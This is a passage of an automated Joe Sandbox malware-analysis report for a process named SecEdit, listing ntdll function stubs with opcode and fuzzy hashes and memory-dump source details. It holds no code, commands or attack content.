                                                        • Opcode ID: 5717e746a3651a40369c05ca8c2de8d154d5ecbdc4b7a34148e8bdc9996284c7
                                                        • Instruction ID: d1a901e75d7a7c7fe006ff88052584a7f5a1f5ea146888d2a36df8f5f3cc2fd5
                                                        • Opcode Fuzzy Hash: 5717e746a3651a40369c05ca8c2de8d154d5ecbdc4b7a34148e8bdc9996284c7
                                                        • Instruction Fuzzy Hash: 7D90023120204C03D580B15885046CA005987E1301F91C419A0015655DCB258A5977A1
                                                        Function 030A2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 144 30a2b80-30a2b8c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e0577317883836b391eff9cd454e1bb2326b21451924109c95ebad49c9edc2de
                                                        • Instruction ID: a5d9300030b608c2a1228dca029069b33069d9ce3bfd90f7dc9d492220de5628
                                                        • Opcode Fuzzy Hash: e0577317883836b391eff9cd454e1bb2326b21451924109c95ebad49c9edc2de
                                                        • Instruction Fuzzy Hash: 6F90023120204C43D500A1588504BC6005987F0301F51C41AA0114655DC725C8517521
                                                        Function 030A2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 145 30a2b90-30a2b9c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 71603d185ab9a316da83de0008a90388945dd63507c9282182b235c7b7b2d072
                                                        • Instruction ID: 8774faa72d1d7ead8b00ed9d721d22c60d454bd25acb8263c8baf1a0eb83ec44
                                                        • Opcode Fuzzy Hash: 71603d185ab9a316da83de0008a90388945dd63507c9282182b235c7b7b2d072
                                                        • Instruction Fuzzy Hash: 009002312020CC03D510A158C5047CA005987E0301F55C815A4414659DC7A588917121
                                                        Function 030A2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 146 30a2bc0-30a2bcc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: d330aabe0a1c877e32168bbb1054ee1f2abf70ac8aa7e2e0ffddd0c4ab4141ca
                                                        • Instruction ID: 36f2413524cec25c49a1e5a579f7d88b773965d76a55d2b4edc162c237676614
                                                        • Opcode Fuzzy Hash: d330aabe0a1c877e32168bbb1054ee1f2abf70ac8aa7e2e0ffddd0c4ab4141ca
                                                        • Instruction Fuzzy Hash: DC90023120204803D500A59895086C6005987F0301F51D415A5014556EC77588917131
                                                        Function 030A2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 141 30a2a80-30a2a8c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 14a6bf8a6e814c348b12b72cf4bde84eb09fc7a4b7eb69d3f6d947e804aac055
                                                        • Instruction ID: ba35cc7baa378a60ac11cf81f3a67b6eb2206b4b1ee2aae9bb10a7ef3a533fe8
                                                        • Opcode Fuzzy Hash: 14a6bf8a6e814c348b12b72cf4bde84eb09fc7a4b7eb69d3f6d947e804aac055
                                                        • Instruction Fuzzy Hash: 8590026120304403C505B1588514696405E87F0201B51C425E1004591DC63588917125
                                                        Function 030A29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 140 30a29f0-30a29fc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 81f6d1215abe323243fcd26f34ba555a8b64e49823a9c701752cb1a645658f76
                                                        • Instruction ID: 27c4bae689797df5ce053073a81d1dd3ce43743600fc5b07737505339b4b69d7
                                                        • Opcode Fuzzy Hash: 81f6d1215abe323243fcd26f34ba555a8b64e49823a9c701752cb1a645658f76
                                                        • Instruction Fuzzy Hash: 40900225212044038505E5584704587009A87E5351351C425F1005551CD73188616121
                                                        Function 030A2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 151 30a2f00-30a2f0c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e28941a4abeeeff2bc93bf1380b0881ec1dae3b9107a8f61108bf996dd2cf86c
                                                        • Instruction ID: eb559b7bd2a6afe7ecc475012182294a3b236be3e86c4b07d9210ff3da3a3a8a
                                                        • Opcode Fuzzy Hash: e28941a4abeeeff2bc93bf1380b0881ec1dae3b9107a8f61108bf996dd2cf86c
                                                        • Instruction Fuzzy Hash: 3B90022121284443D600A5688D14B87005987E0303F51C519A0144555CCA2588616521
                                                        Function 030A2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 150 30a2e50-30a2e5c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a8a19b103af7d20459ba56deb486fe03aa67f591ae1242c61a431da8eac75f22
                                                        • Instruction ID: 4e66f7c97384d1de99b40aaeec84874ecd091a9f92e857973141a712c75d5742
                                                        • Opcode Fuzzy Hash: a8a19b103af7d20459ba56deb486fe03aa67f591ae1242c61a431da8eac75f22
                                                        • Instruction Fuzzy Hash: 4490026134204843D500A1588514B860059C7F1301F51C419E1054555DC729CC527126
                                                        Function 030A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 149 30a2d10-30a2d1c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c33058e4c774c3e4b799dd71ba8acbed9ab2c5b2228c8b705d05bd495d0eb06e
                                                        • Instruction ID: 38733a0b19424df485ee0bfb89dae7dcdd9d9baaa7c1823bec2d2ba995e5cf1e
                                                        • Opcode Fuzzy Hash: c33058e4c774c3e4b799dd71ba8acbed9ab2c5b2228c8b705d05bd495d0eb06e
                                                        • Instruction Fuzzy Hash: 4090023120204813D511A1588604787005D87E0241F91C816A0414559DD7668952B121
                                                        Function 030A2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 147 30a2c30-30a2c3c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 15d271c2dd99c132f26f7808126fdca49e07816d3f3fab179ed5a9387507972d
                                                        • Instruction ID: 2a0652cf78ec418fc95997cfb97750f438d0b3cdc60e193702965fd9dd84f6ba
                                                        • Opcode Fuzzy Hash: 15d271c2dd99c132f26f7808126fdca49e07816d3f3fab179ed5a9387507972d
                                                        • Instruction Fuzzy Hash: 0390022921304403D580B158950868A005987E1202F91D819A0005559CCA2588696321
                                                        Function 030A2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 148 30a2cf0-30a2cfc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3dd88ee3c78d2c0fa07e88b448c7c95562f5ee79f2a210df61d954659646cf35
                                                        • Instruction ID: 11d3c39c455d48e6b1fdc6a4d8c42e3b243f10d07789b09483ab93bb5ed9ac95
                                                        • Opcode Fuzzy Hash: 3dd88ee3c78d2c0fa07e88b448c7c95562f5ee79f2a210df61d954659646cf35
                                                        • Instruction Fuzzy Hash: 0390022124308553D945F1588504587405A97F0241791C416A1404951CC6369856E621
                                                        Function 030A2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 136 30a2b2a-30a2b2f 137 30a2b3f-30a2b46 LdrInitializeThunk 136->137 138 30a2b31-30a2b38 136->138
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 049e108ee09b034f150020c5231acccd2f267fb147c9870383658e23064e599f
                                                        • Instruction ID: 564916da9700d6e0b9baf5b7f79deda6618ef5d6a446b7a840e1a73ee8a9e533
                                                        • Opcode Fuzzy Hash: 049e108ee09b034f150020c5231acccd2f267fb147c9870383658e23064e599f
                                                        • Instruction Fuzzy Hash: 43B09B719038C5C7DA51D7645708757799867D0701F15C465D1460681E8738C091F175
                                                        Function 0057AF53 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117098986422.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_550000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e0b56a9ae10c9fb669f31624acc4627e640614d5f89512385a68cf046d6180e
                                                        • Instruction ID: 23944b4b4bd9308820bbb9bc6612b6e7b23a7fddbd5506dd53ba705c8f978467
                                                        • Opcode Fuzzy Hash: 8e0b56a9ae10c9fb669f31624acc4627e640614d5f89512385a68cf046d6180e
                                                        • Instruction Fuzzy Hash: C7E08C3A200345EFE36EAF20C4424C87BB8FF11327762486EE09009632C7399251EF08

                                                        Non-executed Functions

                                                        Function 03097550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • ExecuteOptions, xrefs: 030D44AB
                                                        • Execute=1, xrefs: 030D451E
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 030D4592
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 030D4530
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 030D4460
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 030D454D
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030D4507
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: 375e1f6bb3e5c92b7bafb8800f9ce0fa8ef25d7129d1be11256d45bf916e8465
                                                        • Instruction ID: ccba7b3fef4c5a95d48981f1d37103c4ad03b62ed2e6f031f31511a3ae044c41
                                                        • Opcode Fuzzy Hash: 375e1f6bb3e5c92b7bafb8800f9ce0fa8ef25d7129d1be11256d45bf916e8465
                                                        • Instruction Fuzzy Hash: 89510976A13319BAEF54EB94EC85FED73E8AF48700F0405EAD505AB181EB709B41DB60
                                                        Function 03069046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        • Opcode ID: 4de6db83e5f611f5f6b65d7e60ce023da2f3bed357e56f2f6e05f0729f9d9195
                                                        • Instruction ID: 98ecda017b08892b42d77d5ca55443e58793b0521befee23229bdf4739a89bbe
                                                        • Opcode Fuzzy Hash: 4de6db83e5f611f5f6b65d7e60ce023da2f3bed357e56f2f6e05f0729f9d9195
                                                        • Instruction Fuzzy Hash: 2C812971D022699BDB35DF54CC44BEEB6B8AB48710F0445EAEA09B7640E7709E84CFA4